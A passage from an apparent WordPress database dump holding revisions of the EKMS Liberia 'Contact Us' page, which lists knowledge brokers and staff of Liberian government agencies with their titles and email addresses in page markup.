/><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 09:59:03','2021-03-29 09:59:03','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3651,42,'2021-03-29 10:09:55','2021-03-29 10:09:55','','simpson','','inherit','open','closed','','simpson','','','2021-03-29 10:09:55','2021-03-29 10:09:55','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png',0,'attachment','image/png',0),(3652,42,'2021-03-29 10:14:18','2021-03-29 10:14:18','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. 